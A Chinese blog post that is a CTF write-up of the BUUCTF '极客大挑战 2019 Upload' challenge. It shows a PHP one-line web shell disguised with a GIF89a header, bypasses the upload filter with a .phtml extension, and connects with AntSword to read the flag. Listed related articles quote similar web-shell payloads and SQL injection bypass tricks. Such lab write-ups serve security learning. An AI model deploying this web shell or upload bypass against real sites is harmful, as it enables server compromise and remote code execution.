日常练习之web(极客大挑战 2019 Upload)

最新推荐文章于 2023-11-25 16:57:05 发布
最新推荐文章于 2023-11-25 16:57:05 发布
阅读量107 收藏
点赞数
分类专栏: web 文章标签: upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/doraemon12345/article/details/110404314
版权

看题目是一件文件上传题,让上传头像,那就传个一句话木马
常用的木马网上也有,这里给出一个这道题用的一个

GIF89a? 
<script language="php">eval($_REQUEST[pass])</script>

一般绕过后缀名检测有php,php3,php5,pht,phtml等几种类型,这里采用phtml

在这里插入图片描述上传成功,拿出蚁剑连接一下
http://xxx(题目的链接)/upload/22.phtml
成功后选择在虚拟终端打开,cat flag

在这里插入图片描述
拿到flag{49f67b50-7e32-4cac-8241-ac54375cd08d}

south_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Web设计挑战:学习Web设计的挑战
02-16
Web设计挑战:学习Web设计的挑战
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
BUUCTF——[极客挑战2019]Upload-1
最新发布
weixin_62248541的博客
11-25 496
BUUCTF-[极客挑战2019]Upload-1
[极客挑战 2019]Upload
qq_52963704的博客
03-23 151
[极客挑战 2019]Upload–个人写题日记 打开靶机,可以看到这是一个让我们上传图片的界面 在这里,我们可以试着上传一句话木马,打开文本编辑器,输入代码<script language="php">eval($_POST['shell']);</script>用phtml的格式上传。.phtml格式的文件是php和html结合的网页文件。 改文件后缀名 进入靶机,上传木马文件,发现不能上传成功,此时说该文件不是image。所以我们需要改文件格式,可以使用burpsuit抓包
[极客挑战 2019]Upload 1
xixixihan的博客
11-25 774
做题分享
CTF-Web-[极客挑战 2019]Upload
归子莫的博客
05-03 4992
CTF-Web-[极客挑战 2019]Upload 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Upload 打开题目的实例 思路 做一个phtml的文件 将...
ISCC2019个人挑战赛题练习
05-05
【ISCC2019个人挑战赛题练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
极客挑战2019Upload解题
Bird&Bird
10-26 3765
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
[原题复现][极客挑战 2019]HardSQL(update报错注入)
笑花大王
02-15 2920
简介 原题复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 复现 经过手工测试过滤了and、= 空格 union等多个sql关键字 要思考如何绕过这些关键字去注入! 使用updatexml报错法注入 查数据库信息 http://1bfb...
BUUCTF [极客挑战 2019] Http
Senimo
12-10 305
BUUCTF [极客挑战 2019] Http 启动环境: 主页为三叶草技术小组纳新,查看网页源码 ,发现隐藏的页面: <div class="image"><img src="images/pic01.jpg" alt="" /></div><div class="content"> <h2>小组简介</h2> <p>·成立时间:2005年3月<br /><br /> ·研究领
BUUCTF-web刷题记录-2
qq_45628145的博客
07-27 432
[极客挑战 2019]HardSQL 一个登陆框,简单测试一下很多包括union等字符被过滤了,这里这样构造可以成功登录,但是没有flag,所以是要把flag从数据库读出来了 admin'Or(1)# 1 发现^没有被过滤,可以用来代替and,与extractvalue函数结合来尝试进行报错注入 这个函数在这里的大致用法是这样的,extractvalue(null,concat(0x7e,user(),0x7e)),中间的user()即为你想执行的查询语句 接下来这题就是爆库,爆表,爆字段,爆内容的基本
BUUCTF Web [极客挑战 2019]Havefun
热门推荐
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客挑战 2019]Havefun一、题目简介二、思路分析1)信息泄露2)代码功能审计三、解题过程1)查看页面源代码2)提交参数四、总结 一、题目简介 进入题目连接以后,出现了一只「猫」,普普通通的一只猫,没什么特别的功能。 二、思路分析 1)信息泄露 这一关是「信息泄露」.
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 740
文件上传冲啊!!!!!!
[原题复现][极客挑战 2019]HardSQL(updatexml报错注入)
笑花大王
02-15 155
简介 原题复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 复现 经过手工测试过滤了and、= 空格 union等多个sql关键字 要思考如何绕过这些关键字去注入! 使用updatexml报错法注入 查数据库信息 http://1bfb...
BUUCTF WEB [极客挑战 2019]Upload
Y1da的博客
04-16 486
BUUCTF WEB [极客挑战 2019]Upload 尝试提交一句话木马shell.php <?php @eval($_POST['shell']);?> 回显为 NOT!php! 说明需要修改文件后缀 修改文件后缀为.phtml后尝试提交,回显为 NO! HACKER! your file included '<?' 说明不能包含<?,尝试绕过过滤 将文件内容修改为 <script language="php">eval($_POST['she
[极客挑战 2019]BabySQL
weixin_52116519的博客
04-15 504
前言 SQL注入的题,总是做的断断续续的,不看wp根本不能完整地做出来,我真的是太菜了。 步骤 1、看报错!!!一开始忽略不看,看了wp后,发现报错很重要 2、测试列数 3、测试成功 4、回显 必须找一个不存在的用户名,这样就能回显union select的值 5、爆库 6、爆表名 0' uunionnion seselectlect 1,2group_concat(table_name) from information_schema.tables where table_schema=datab
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值